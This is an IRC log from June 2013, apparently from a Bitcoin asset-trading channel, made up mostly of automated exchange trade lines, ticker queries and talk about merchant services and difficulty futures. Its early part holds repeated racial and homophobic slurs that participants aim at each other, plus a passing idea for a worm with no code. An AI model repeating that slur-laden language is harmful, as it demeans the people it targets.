07:11:43 we have cca 100k atm. Jun 11 07:11:46 in the movie Jun 11 07:11:50 you mean buterin ? Jun 11 07:11:52 vladimir is like that guy Jun 11 07:12:13 yes Jun 11 07:12:39 well they're all nobodies. if they weren't they wouldn't be involved with the trade press. such as it is, bless its soul. Jun 11 07:13:21 <[\\\]> in other news Jun 11 07:13:30 <[\\\]> I opened a ticket with walletbit Jun 11 07:13:44 whats walletbit Jun 11 07:13:52 <[\\\]> avalon's merchant Jun 11 07:13:59 <[\\\]> account Jun 11 07:14:09 <[\\\]> missing order Jun 11 07:14:14 <[\\\]> so what do they do? Jun 11 07:14:18 <[\\\]> close the ticket without comment. Jun 11 07:14:35 even they know you have no coins and therefore Jun 11 07:14:41 no legitimate cause to complain Jun 11 07:14:51 classism Jun 11 07:14:58 classic classism Jun 11 07:15:03 <[\\\]> I have no coins because places like these asshats keep screwing me out of them Jun 11 07:15:04 i can't believe avalon still uses walletbit after that immense fiasco last time. Jun 11 07:15:06 shut up nigger Jun 11 07:15:18 sorry, poor nigger Jun 11 07:15:28 or for that matter i can't believe walletbit is still around trying to pretend they're in business. Jun 11 07:15:41 what'cha'll nigg'in 'bout Jun 11 07:15:51 Apparently in the NSA database I'm carbon entity #270719852 Jun 11 07:15:53 *what'cha'll nigger'in 'bout Jun 11 07:17:07 so I head an idea for a worm infects everyone and just randomly sends fed bait words Jun 11 07:18:57 did you see trollthe nsa.org Jun 11 07:19:00 did you see trollthensa.org Jun 11 07:19:15 no Jun 11 07:19:30 .com Jun 11 07:19:33 i failed thrice Jun 11 07:20:00 [MPEX] [S.MPOE] 3200 @ 0.00072426 = 2.3176 BTC [+] Jun 11 07:20:02 [MPEX] [S.MPOE] 1300 @ 0.00072513 = 0.9427 BTC [+] Jun 11 07:20:43 Maybe I am Satoshi. Apparently he also left two spaces after his full stops. Jun 11 07:20:47 <[\\\]> ;;getrating walletbit Jun 11 07:20:48 This user has not yet been rated. WARNING: Currently not authenticated. Jun 11 07:21:25 <[\\\]> I'm digging their stats Jun 11 07:21:26 <[\\\]> Commercial Places Jun 11 07:21:26 <[\\\]> 375 Jun 11 07:21:26 <[\\\]> Transactions Today Jun 11 07:21:26 <[\\\]> 2 Jun 11 07:21:26 <[\\\]> Brick-and-mortar stores Jun 11 07:21:27 <[\\\]> 0 Jun 11 07:21:28 Neil are you a faggot ? apparently he was a faggot. Jun 11 07:21:45 mircea_popescu: That would be telling. Jun 11 07:22:12 sounds faggoty enough. Jun 11 07:22:37 i do two spaces after periods Jun 11 07:22:41 i was tought that Jun 11 07:22:45 <[\\\]> wash after the period Jun 11 07:22:49 <[\\\]> you can thank me later Jun 11 07:22:58 terribru Jun 11 07:23:33 yall dont wear teh dolmio grin Jun 11 07:24:31 ud'd it. interesting Jun 11 07:25:18 jcpham: Ah, but unlike you, I'm also "in Japan" and code C++. So obviously it's me. Jun 11 07:25:43 [BTCTC] [ASICMINER-PT] 3 @ 2.499 = 7.497 BTC [+] Jun 11 07:26:08 i'm vietnamese or armenian Jun 11 07:26:23 depends on who you ask Jun 11 07:26:44 so clearly i'm not satoshi Jun 11 07:27:06 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00777 = 0.777 BTC [+] Jun 11 07:27:08 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.00782 = 2.346 BTC [+] Jun 11 07:27:09 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.00785 = 1.9625 BTC [+] Jun 11 07:27:10 [BTCTC] [TAT.VIRTUALMINE] 155 @ 0.00795 = 1.2323 BTC [+] Jun 11 07:27:12 [BTCTC] [TAT.VIRTUALMINE] 445 @ 0.00798 = 3.5511 BTC [+] Jun 11 07:28:09 I was in Vietnam 3 times last year. The girls there are smoking. Jun 11 07:28:47 i only like sad, fat chicks Jun 11 07:28:49 'girls' Jun 11 07:28:58 dub: http://4.bp.blogspot.com/-PVkTRk8bqdo/TxhyvP9xnuI/AAAAAAAAFPk/sjN2eiR9tjk/s1600/Hudson%2B-%2B6%2Bmonths%2B015.jpg Jun 11 07:29:08 check that dolmi grin Jun 11 07:29:14 *dolmio Jun 11 07:29:21 thats'a delicious mamma Jun 11 07:31:07 Although I think Khmer women had even more natural beauty. But was only in Cambodia for 3 days; not enough time to get a real idea. And unfortunately on a tour (from Vietnam) so couldn't interact. Jun 11 07:31:41 why can't you interact ?! Jun 11 07:32:15 Stuck in a hotel with foreigners, too far to walk.. and a bit too lazy I guess. Dunno really. Jun 11 07:32:41 Vietnam I was free and it was great. Jun 11 07:32:45 balinese girls are not bad Jun 11 07:33:03 and mostly girls Jun 11 07:33:18 Gym time. Jun 11 07:33:37 confirmed faggot Jun 11 07:35:06 ima go spot him Jun 11 07:35:09 nighty all. Jun 11 07:35:09 http://www.youtube.com/watch?v=DmoZAPDV3ew Jun 11 07:35:15 somewhere in that video Jun 11 07:35:22 nn **** BEGIN LOGGING AT Tue Jun 11 15:26:47 2013 Jun 11 15:33:51 [BTCTC] [DMS.SELLING] 40 @ 0.03602 = 1.4408 BTC [-] Jun 11 15:33:55 [BTCTC] [DMS.SELLING] 2 @ 0.03601 = 0.072 BTC [-] Jun 11 15:33:58 [BTCTC] [DMS.SELLING] 25 @ 0.036 = 0.9 BTC [-] Jun 11 15:36:56 ;;ticker Jun 11 15:36:57 BTCUSD ticker | Best bid: 106.36188, Best ask: 106.74793, Bid-ask spread: 0.38605, Last trade: 106.36187, 24 hour volume: 22311.16035288, 24 hour low: 101.00000, 24 hour high: 107.50000, 24 hour vwap: 104.77244 Jun 11 15:37:08 [BTCTC] [DMS.MINING] 50 @ 0.0315 = 1.575 BTC [+] Jun 11 15:37:10 [BTCTC] [DMS.MINING] 32 @ 0.032 = 1.024 BTC [+] Jun 11 15:46:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.025 = 1.25 BTC [-] Jun 11 15:48:54 [MPEX] [S.MPOE] 8490 @ 0.0007287 = 6.1867 BTC [+] Jun 11 15:52:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [-] Jun 11 15:55:07 [BTCTC] [DMS.MINING] 92 @ 0.032 = 2.944 BTC [+] Jun 11 15:59:04 [BTCTC] [ASICMINER-PT] 1 @ 2.49121 BTC [-] Jun 11 15:59:34 [BTCTC] [ASICMINER-PT] 4 @ 2.4999 = 9.9996 BTC [+] Jun 11 16:00:14 [BTCTC] [TAT.ASICMINER] 25 @ 0.0251 = 0.6275 BTC [+] Jun 11 16:00:23 ugh..somebody do something. this is painful. Jun 11 16:00:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02517 BTC [+] Jun 11 16:00:48 hacker what exactly ? Jun 11 16:06:07 [BTCTC] [DMS.MINING] 32 @ 0.032 = 1.024 BTC [+] Jun 11 16:09:55 [BTCTC] [BTC-TRADING-PT] 1 @ 0.332999 BTC [+] Jun 11 16:12:44 [BTCTC] [DMS.PURCHASE] 7 @ 0.065258 = 0.4568 BTC Jun 11 16:16:45 [BTCTC] [DMS.MINING] 1 @ 0.032 BTC [+] Jun 11 16:16:46 [BTCTC] [TAT.ASICMINER] 19 @ 0.02517 = 0.4782 BTC [+] Jun 11 16:18:28 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [-] Jun 11 16:20:33 [BTCTC] [ESECURITYSABTC] 1 @ 0.192421 BTC [-] Jun 11 16:20:43 thestringpuller hey, so where's that argument ? Jun 11 16:23:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.02517 = 0.1762 BTC [+] Jun 11 16:24:05 [HAVELOCK] [ASICM] 97 @ 0.0251 = 2.4347 BTC [-] Jun 11 16:24:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4998 BTC [-] Jun 11 16:24:52 [BTCTC] [ASICMINER-PT] 5 @ 2.4999 = 12.4995 BTC [+] Jun 11 16:25:19 [BTCTC] [DMS.MINING] 2 @ 0.032 = 0.064 BTC [+] Jun 11 16:25:46 [HAVELOCK] [ASICM] 52 @ 0.0251 = 1.3052 BTC [-] Jun 11 16:28:01 [MPEX] [S.MG] 100000 @ 0.000105 = 10.5 BTC [+] Jun 11 16:28:47 !t m ^oix Jun 11 16:28:48 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 72.38373861 / 149.20166805 / 158.74137702 (95 shares, 28.61 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jun 11 16:28:52 hey, it's back Jun 11 16:30:51 yea, reading from 95 options sold :) Jun 11 16:30:53 ;;bc,stats Jun 11 16:30:56 Current Blocks: 240926 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 993 blocks | Next Difficulty In About: 6 days, 0 hours, 26 minutes, and 10 seconds | Next Difficulty Estimate: 18634242.6032 | Estimated Percent Change: 19.40716 Jun 11 16:31:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.02517 = 0.3272 BTC [+] Jun 11 16:31:59 [BTCTC] [TAT.ASICMINER] 30 @ 0.02518 = 0.7554 BTC [+] Jun 11 16:32:00 mircea_popescu: so we can expect X.IDIFF.JUN to autoexpire on Monday? Jun 11 16:32:02 [BTCTC] [TAT.ASICMINER] 23 @ 0.02518 = 0.5791 BTC [+] Jun 11 16:32:09 nope ? Jun 11 16:32:21 Note that all X.IDIFF.* futures trading during the third Wednesday of their month may have settled (in which case the next year is already trading) or may not have yet settled (in which case the current year is still trading). Check before trading (settlements are announced on twitter and irc). Jun 11 16:32:42 3rd wed is 20th Jun 11 16:33:13 i mean this: Consequently, in the event of a net seller's deposited collateral being exceded by current difficulty a proportional number of open contracts will be forcibly liquidated. Jun 11 16:33:28 or the collateral is more than 18m satoshi? Jun 11 16:34:52 [HAVELOCK] [ASICM] 60 @ 0.0251 = 1.506 BTC [-] Jun 11 16:34:54 [HAVELOCK] [ASICM] 11 @ 0.02502 = 0.2752 BTC [-] Jun 11 16:34:55 [HAVELOCK] [ASICM] 500 @ 0.025 = 12.5 BTC [-] Jun 11 16:34:56 [HAVELOCK] [ASICM] 29 @ 0.025 = 0.725 BTC [-] Jun 11 16:35:17 btw, wednesday is 19th not 20th Jun 11 16:36:30 right, 19th Jun 11 16:36:37 [HAVELOCK] [ASICM] 6 @ 0.02515 = 0.1509 BTC [+] Jun 11 16:37:14 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 11 16:37:30 [BTCTC] [ASICMINER-PT] 1 @ 2.49122 BTC [-] Jun 11 16:37:39 [BTCTC] [DMS.PURCHASE] 38 @ 0.065258 = 2.4798 BTC Jun 11 16:38:26 http://bitbet.us/bet/463/block-241921-difficulty-will-be-an-even-number/ Jun 11 16:38:32 A 50% bet with better than 50% odds Jun 11 16:38:34 [MPEX] [S.MPOE] 900 @ 0.0007287 = 0.6558 BTC [+] Jun 11 16:38:35 [MPEX] [S.MPOE] 5050 @ 0.00072918 = 3.6824 BTC [+] Jun 11 16:38:44 [MPEX] [S.MPOE] 2650 @ 0.00072927 = 1.9326 BTC [+] Jun 11 16:39:04 the odds are odd, wehre's the problem? Jun 11 16:40:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.151 BTC [-] Jun 11 16:40:30 I'm just pointing out that because one side has double the bets of the other, by betting with the low side you have better than 100% return if you're right. For a suitably sized bet. Jun 11 16:40:58 It's just a coin flip with better than even payoff Jun 11 16:41:17 well grab the inefficency in your pocket Jun 11 16:41:49 oh i was expecting like 100btc difference... but that's a dust and can change on a whim Jun 11 16:42:29 [HAVELOCK] [ASICM] 4 @ 0.02514 = 0.1006 BTC [-] Jun 11 16:42:54 Sure it's just dust Jun 11 16:43:37 i wonder whether "this bet will resolve to whichever side paid more" would be accepted. Jun 11 16:45:00 prolly not as it's not independent event. could cause crazy bitcoingem spiral Jun 11 16:45:09 [BTCTC] [DMS.MINING] 5 @ 0.0319 = 0.1595 BTC [-] Jun 11 16:45:20 lol bitcoingem. What ever happened to that? Jun 11 16:46:31 jurov was discussed before. no it wouldn't. Jun 11 16:47:24 Sheesh bitcoingem ponzi is still going. Jun 11 16:48:04 [MPEX] [S.MPOE] 1671 @ 0.00072927 = 1.2186 BTC [+] Jun 11 16:48:07 [MPEX] [S.MPOE] 1529 @ 0.00072928 = 1.1151 BTC [+] Jun 11 16:48:19 jurov re rthe execution : pre march jun futures are 2.9 ^ 2 * 3.37 mn or so. Jun 11 16:48:40 post march just 2.9 * 3.37 Jun 11 16:49:29 so anywhere between ~10mn and ~28 mn said autoexecution could occur. Jun 11 16:50:31 i would say overall my arbitrary 2.9 comes out to have been quite judiciously chosen, for that matter. Jun 11 16:51:23 bah nowait. Jun 11 16:51:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0079 BTC [-] Jun 11 16:52:37 just 2.9 * 6.whateveritwas. Jun 11 16:54:01 as long as the cover is better than current diff (0.156), i'm okay with it. Jun 11 16:54:27 i bought at 0.159 iirc Jun 11 16:54:48 we'll see next week Jun 11 16:55:08 [HAVELOCK] [ASICM] 99 @ 0.02514 = 2.4889 BTC [-] Jun 11 16:59:57 [HAVELOCK] [ASICM] 397 @ 0.02514 = 9.9806 BTC [-] Jun 11 16:59:58 [HAVELOCK] [ASICM] 94 @ 0.02515 = 2.3641 BTC [+] Jun 11 17:00:00 [HAVELOCK] [ASICM] 200 @ 0.02516 = 5.032 BTC [+] Jun 11 17:00:01 [HAVELOCK] [ASICM] 200 @ 0.02517 = 5.034 BTC [+] Jun 11 17:00:02 [HAVELOCK] [ASICM] 104 @ 0.02518 = 2.6187 BTC [+] Jun 11 17:01:08 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 17:09:18 [BTCTC] [DMS.PURCHASE] 1 @ 0.065258 BTC Jun 11 17:15:14 [BTCTC] [ASICMINER-PT] 2 @ 2.4921 = 4.9842 BTC [+] Jun 11 17:15:16 [BTCTC] [ASICMINER-PT] 1 @ 2.492 BTC [-] Jun 11 17:15:17 [BTCTC] [ASICMINER-PT] 1 @ 2.492 BTC [-] Jun 11 17:15:19 [BTCTC] [ASICMINER-PT] 2 @ 2.49121 = 4.9824 BTC [-] Jun 11 17:15:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4912 BTC [-] Jun 11 17:15:23 [BTCTC] [ASICMINER-PT] 10 @ 2.491 = 24.91 BTC [-] Jun 11 17:15:25 [BTCTC] [ASICMINER-PT] 5 @ 2.49 = 12.45 BTC [-] Jun 11 17:16:34 [HAVELOCK] [HIM] 3 @ 0.2713 = 0.8139 BTC [-] Jun 11 17:25:12 [BTCTC] [ASICMINER-PT] 1 @ 2.49999 BTC [+] Jun 11 17:26:08 [BTCTC] [COGNITIVE] 1 @ 0.304999 BTC [+] Jun 11 17:26:15 [HAVELOCK] [ASICM] 40 @ 0.02518 = 1.0072 BTC [+] Jun 11 17:26:39 [BTCTC] [BASIC-MINING] 1 @ 0.695555 BTC [+] Jun 11 17:38:18 [BTCTC] [ASICMINER-PT] 1 @ 2.481 BTC [-] Jun 11 17:48:05 [MPEX] [S.MPOE] 7500 @ 0.00072772 = 5.4579 BTC [-] Jun 11 17:53:47 in other words, there is no news. Jun 11 17:54:26 [BTCTC] [DMS.PURCHASE] 46 @ 0.065258 = 3.0019 BTC Jun 11 18:19:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [-] Jun 11 18:21:06 ;;next Jun 11 18:21:06 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 110 | support: 100, 96-97 | #bitcoin [Mon, 10 Jun 2013 04:15:07 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 day, 11 hours, 5 minutes, and 57 seconds ago Jun 11 18:23:30 [HAVELOCK] [ASICM] 2 @ 0.02500001 = 0.05 BTC [-] Jun 11 18:23:32 [HAVELOCK] [ASICM] 40 @ 0.02500001 = 1 BTC [-] Jun 11 18:23:33 [HAVELOCK] [ASICM] 44 @ 0.025 = 1.1 BTC [-] Jun 11 18:24:07 [MPEX] [S.MPOE] 6387 @ 0.00072786 = 4.6488 BTC [+] Jun 11 18:25:53 [MPEX] [S.MPOE] 1427 @ 0.00072786 = 1.0387 BTC [+] Jun 11 18:25:55 [MPEX] [S.MPOE] 6823 @ 0.00072898 = 4.9738 BTC [+] Jun 11 18:25:59 [BTCTC] [DMS.MINING] 46 @ 0.031 = 1.426 BTC [-] Jun 11 18:31:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.0251 = 0.1004 BTC [-] Jun 11 18:34:53 [HAVELOCK] [ASICM] 8 @ 0.02515 = 0.2012 BTC [+] Jun 11 18:36:30 [HAVELOCK] [ASICM] 324 @ 0.02515 = 8.1486 BTC [+] Jun 11 18:37:39 [BTCTC] [BTC-BOND] 50 @ 0.00984 = 0.492 BTC [-] Jun 11 18:38:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [-] Jun 11 18:39:17 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.0079 = 0.1501 BTC [-] Jun 11 18:39:18 [BTCTC] [TAT.VIRTUALMINE] 31 @ 0.00845 = 0.262 BTC [+] Jun 11 18:40:05 [BTCTC] [PAJKA.BOND] 15 @ 0.087999 = 1.32 BTC [-] Jun 11 18:40:47 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.00845 = 1.2675 BTC [+] Jun 11 18:42:53 [BTCTC] [DMS.SELLING] 8 @ 0.03317 = 0.2654 BTC [-] Jun 11 18:42:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.0251 = 0.1255 BTC [-] Jun 11 18:42:57 [BTCTC] [DMS.SELLING] 20 @ 0.03317 = 0.6634 BTC [-] Jun 11 18:43:03 [BTCTC] [DMS.SELLING] 10 @ 0.0331 = 0.331 BTC [-] Jun 11 18:44:20 [BTCTC] [DMS.MINING] 39 @ 0.03189 = 1.2437 BTC [+] Jun 11 18:45:28 [BTCTC] [PAJKA.BOND] 47 @ 0.087999 = 4.136 BTC [-] Jun 11 18:47:40 [BTCTC] [TAT.VIRTUALMINE] 224 @ 0.00845 = 1.8928 BTC [+] Jun 11 18:50:04 [BTCTC] [DMS.MINING] 11 @ 0.03189 = 0.3508 BTC [+] Jun 11 18:50:06 [BTCTC] [DMS.MINING] 63 @ 0.03189 = 2.0091 BTC [+] Jun 11 18:50:07 [BTCTC] [DMS.MINING] 1 @ 0.031897 BTC [+] Jun 11 18:50:08 [BTCTC] [DMS.MINING] 64 @ 0.0319 = 2.0416 BTC [+] Jun 11 18:50:09 [BTCTC] [DMS.MINING] 62 @ 0.0329 = 2.0398 BTC [+] Jun 11 18:50:11 [BTCTC] [DMS.MINING] 56 @ 0.032986 = 1.8472 BTC [+] Jun 11 18:50:12 [BTCTC] [DMS.MINING] 1 @ 0.033327 BTC [+] Jun 11 18:50:13 [BTCTC] [DMS.MINING] 42 @ 0.03334 = 1.4003 BTC [+] Jun 11 18:52:06 [BTCTC] [DMS.PURCHASE] 50 @ 0.065258 = 3.2629 BTC Jun 11 18:52:20 [BTCTC] [DMS.PURCHASE] 22 @ 0.065258 = 1.4357 BTC Jun 11 18:53:49 [BTCTC] [B.YABMC] 100 @ 0.01491 = 1.491 BTC [+] Jun 11 18:55:07 [BTCTC] [BITVPS] 1 @ 0.00066 BTC [+] Jun 11 18:55:08 [BTCTC] [BITVPS] 4 @ 0.000658 = 0.0026 BTC [-] Jun 11 18:55:50 [HAVELOCK] [ASICM] 2 @ 0.02516 = 0.0503 BTC [+] Jun 11 18:56:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0251 = 0.0753 BTC [-] Jun 11 18:57:01 [BTCTC] [DMS.MINING] 22 @ 0.033 = 0.726 BTC [-] Jun 11 18:57:03 [BTCTC] [DMS.MINING] 48 @ 0.03334 = 1.6003 BTC [+] Jun 11 18:57:55 [BTCTC] [PAJKA.BOND] 2 @ 0.089992 = 0.18 BTC [+] Jun 11 18:58:35 [BTCTC] [BITVPS] 2 @ 0.000718 = 0.0014 BTC [+] Jun 11 18:59:03 [BTCTC] [DMS.MINING] 5 @ 0.03334 = 0.1667 BTC [+] Jun 11 18:59:54 [HAVELOCK] [ASICM] 3 @ 0.0251 = 0.0753 BTC [-] Jun 11 19:00:00 [BTCTC] [ASICMINER-PT] 1 @ 2.49998 BTC [+] Jun 11 19:00:01 [BTCTC] [BTC-BOND] 3 @ 0.009997 = 0.03 BTC [+] Jun 11 19:00:15 [BTCTC] [BTC-BOND] 2 @ 0.009997 = 0.02 BTC [+] Jun 11 19:01:22 [BTCTC] [S.BBET-PT] 1 @ 0.00207 BTC [+] Jun 11 19:01:44 [HAVELOCK] [ASICM] 1 @ 0.0249511 BTC [-] Jun 11 19:03:12 [BTCTC] [BITVPS] 1 @ 0.000718 BTC [+] Jun 11 19:06:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.0251 = 0.502 BTC [-] Jun 11 19:09:34 [HAVELOCK] [ASICM] 45 @ 0.025 = 1.125 BTC [+] Jun 11 19:12:45 [BTCTC] [ASICMINER-PT] 6 @ 2.49999 = 14.9999 BTC [+] Jun 11 19:15:30 ;;seen mircea_popescu Jun 11 19:15:31 mircea_popescu was last seen in #bitcoin-assets 2 hours, 22 minutes, and 52 seconds ago: just 2.9 * 6.whateveritwas. Jun 11 19:16:07 [MPEX] [S.MPOE] 2350 @ 0.00072772 = 1.7101 BTC [-] Jun 11 19:16:21 ;;later tell mircea_popescu I'm working on it. Not an argument just observations based on what MPOE-PR said. Jun 11 19:16:21 The operation succeeded. Jun 11 19:16:24 It's coming Jun 11 19:16:51 a ok Jun 11 19:19:20 ;;ticker Jun 11 19:19:22 BTCUSD ticker | Best bid: 109.10001, Best ask: 109.39000, Bid-ask spread: 0.28999, Last trade: 109.39000, 24 hour volume: 18618.39604508, 24 hour low: 102.80000, 24 hour high: 109.00000, 24 hour vwap: 106.03775 Jun 11 19:19:35 ;;asks 11111111111111 Jun 11 19:19:35 There are currently 121835.37 bitcoins offered at or under 1.11111111111e+13 USD, worth 3.19778141379e+12 USD in total. | Data vintage: 27.7717 seconds Jun 11 19:19:37 ;;bids 0 Jun 11 19:19:38 There are currently 23020720 bitcoins demanded at or over 0.0 USD, worth 12130792.9223 USD in total. | Data vintage: 30.6861 seconds Jun 11 19:20:05 ;;bids 101 Jun 11 19:20:06 There are currently 6890.8332 bitcoins demanded at or over 101.0 USD, worth 713949.322488 USD in total. | Data vintage: 58.7986 seconds Jun 11 19:20:24 ;;asks 129.94 Jun 11 19:20:25 There are currently 33087.71 bitcoins offered at or under 129.94 USD, worth 3999584.99304 USD in total. | Data vintage: 77.6132 seconds Jun 11 19:20:44 [BTCTC] [ASICMINER-PT] 3 @ 2.49999 = 7.5 BTC [+] Jun 11 19:23:17 [BTCTC] [ASICMINER-PT] 7 @ 2.49999 = 17.4999 BTC [+] Jun 11 19:24:03 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.008448 = 0.169 BTC [-] Jun 11 19:28:37 [BTCTC] [PAJKA.BOND] 5 @ 0.089992 = 0.45 BTC [+] Jun 11 19:30:16 [BTCTC] [ASICMINER-PT] 1 @ 2.49999 BTC [+] Jun 11 19:33:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.025001 BTC [-] Jun 11 19:33:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [-] Jun 11 19:33:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 11 19:36:59 [BTCTC] [ASICMINER-PT] 1 @ 2.495 BTC [-] Jun 11 19:37:34 [BTCTC] [DMS.PURCHASE] 10 @ 0.066195 = 0.662 BTC [+] Jun 11 19:37:38 [BTCTC] [S.DICE-PT] 20 @ 0.002777 = 0.0555 BTC [-] Jun 11 19:41:01 [HAVELOCK] [ASICM] 7 @ 0.024952 = 0.1747 BTC [-] Jun 11 19:43:04 [BTCTC] [S.DICE-PT] 4 @ 0.002778 = 0.0111 BTC [+] Jun 11 19:43:42 [BTCTC] [S.DICE-PT] 16 @ 0.00278 = 0.0445 BTC [+] Jun 11 19:46:11 [BTCTC] [DMS.SELLING] 7 @ 0.0387 = 0.2709 BTC [+] Jun 11 19:46:13 [BTCTC] [DMS.SELLING] 2 @ 0.0387 = 0.0774 BTC [+] Jun 11 19:46:17 [BTCTC] [DMS.SELLING] 17 @ 0.039 = 0.663 BTC [+] Jun 11 19:46:18 [BTCTC] [DMS.SELLING] 4 @ 0.0414 = 0.1656 BTC [+] Jun 11 19:49:09 !ticker m S.MG Jun 11 19:49:10 [MPEX:S.MG] 1D: 0.0001 / 0.00010008 / 0.000105 (6110050 shares, 611.53 BTC), 7D: 0.0001 / 0.00010008 / 0.00010555 (88196605 shares, 8,827.20 BTC), 30D: 0.0001 / 0.00010008 / 0.00010555 (88196605 shares, 8,827.20 BTC) Jun 11 19:52:51 ;;next Jun 11 19:52:51 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 110 | support: 100, 96-97 | #bitcoin [Mon, 10 Jun 2013 04:15:07 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 day, 12 hours, 37 minutes, and 41 seconds ago Jun 11 19:52:58 ;;ticker Jun 11 19:52:59 BTCUSD ticker | Best bid: 108.06101, Best ask: 108.99999, Bid-ask spread: 0.93898, Last trade: 108.99997, 24 hour volume: 18789.44952589, 24 hour low: 103.23021, 24 hour high: 109.60000, 24 hour vwap: 106.20720 Jun 11 19:56:53 [BTCTC] [TAT.ASICMINER] 9 @ 0.02495 = 0.2246 BTC [-] Jun 11 19:57:35 [BTCTC] [DMS.MINING] 43 @ 0.0325 = 1.3975 BTC [-] Jun 11 19:58:17 [BTCTC] [DMS.MINING] 2 @ 0.03334 = 0.0667 BTC [+] Jun 11 20:00:15 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.008399 = 0.3948 BTC [-] Jun 11 20:02:16 [BTCTC] [DMS.PURCHASE] 100 @ 0.066195 = 6.6195 BTC [+] Jun 11 20:03:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.024921 = 0.1495 BTC [-] Jun 11 20:03:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.02492 = 0.0997 BTC [-] Jun 11 20:03:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.024902 BTC [-] Jun 11 20:03:54 [BTCTC] [TAT.VIRTUALMINE] 53 @ 0.008399 = 0.4451 BTC [-] Jun 11 20:03:56 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0083 = 0.0498 BTC [-] Jun 11 20:09:07 [HAVELOCK] [ASICM] 8 @ 0.02524 = 0.2019 BTC [+] Jun 11 20:09:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.02489 = 0.1245 BTC [-] Jun 11 20:09:56 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0084 = 0.168 BTC [+] Jun 11 20:10:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.02489 = 0.1493 BTC [-] Jun 11 20:10:42 [BTCTC] [TAT.ASICMINER] 33 @ 0.024885 = 0.8212 BTC [-] Jun 11 20:10:49 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0084 = 0.252 BTC [+] Jun 11 20:12:00 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0084 = 0.84 BTC [+] Jun 11 20:12:11 [BTCTC] [DMS.MINING] 3 @ 0.03334 = 0.1 BTC [+] Jun 11 20:12:13 [BTCTC] [DMS.MINING] 88 @ 0.03334 = 2.9339 BTC [+] Jun 11 20:12:13 [BTCTC] [DMS.MINING] 109 @ 0.03345 = 3.6461 BTC [+] Jun 11 20:12:32 [HAVELOCK] [VTX] 5 @ 0.46 = 2.3 BTC [-] Jun 11 20:13:35 [BTCTC] [ASICMINER-PT] 2 @ 2.49999 = 5 BTC [+] Jun 11 20:14:10 [HAVELOCK] [ASICM] 97 @ 0.02501 = 2.426 BTC [-] Jun 11 20:14:12 [HAVELOCK] [ASICM] 5 @ 0.02500001 = 0.125 BTC [-] Jun 11 20:14:13 [HAVELOCK] [ASICM] 298 @ 0.025 = 7.45 BTC [-] Jun 11 20:14:57 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0084 = 0.42 BTC [+] Jun 11 20:15:40 [HAVELOCK] [SDICE] 6 @ 0.2121 = 1.2726 BTC [+] Jun 11 20:16:31 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.008405 = 0.4203 BTC [+] Jun 11 20:17:04 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.008405 = 0.4203 BTC [+] Jun 11 20:19:05 [BTCTC] [TAT.ASICMINER] 29 @ 0.02489 = 0.7218 BTC [+] Jun 11 20:20:11 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.008405 = 0.2353 BTC [+] Jun 11 20:20:13 [BTCTC] [ASICMINER-PT] 3 @ 2.4951 = 7.4853 BTC [-] Jun 11 20:20:21 [BTCTC] [ASICMINER-PT] 4 @ 2.495 = 9.98 BTC [-] Jun 11 20:20:33 [BTCTC] [ASICMINER-PT] 5 @ 2.4941 = 12.4705 BTC [-] Jun 11 20:20:41 [BTCTC] [ASICMINER-PT] 2 @ 2.494 = 4.988 BTC [-] Jun 11 20:20:45 [BTCTC] [ASICMINER-PT] 1 @ 2.491 BTC [-] Jun 11 20:20:50 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [-] Jun 11 20:20:52 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 11 20:21:07 [MPEX] [S.MPOE] 11577 @ 0.00072898 = 8.4394 BTC [+] Jun 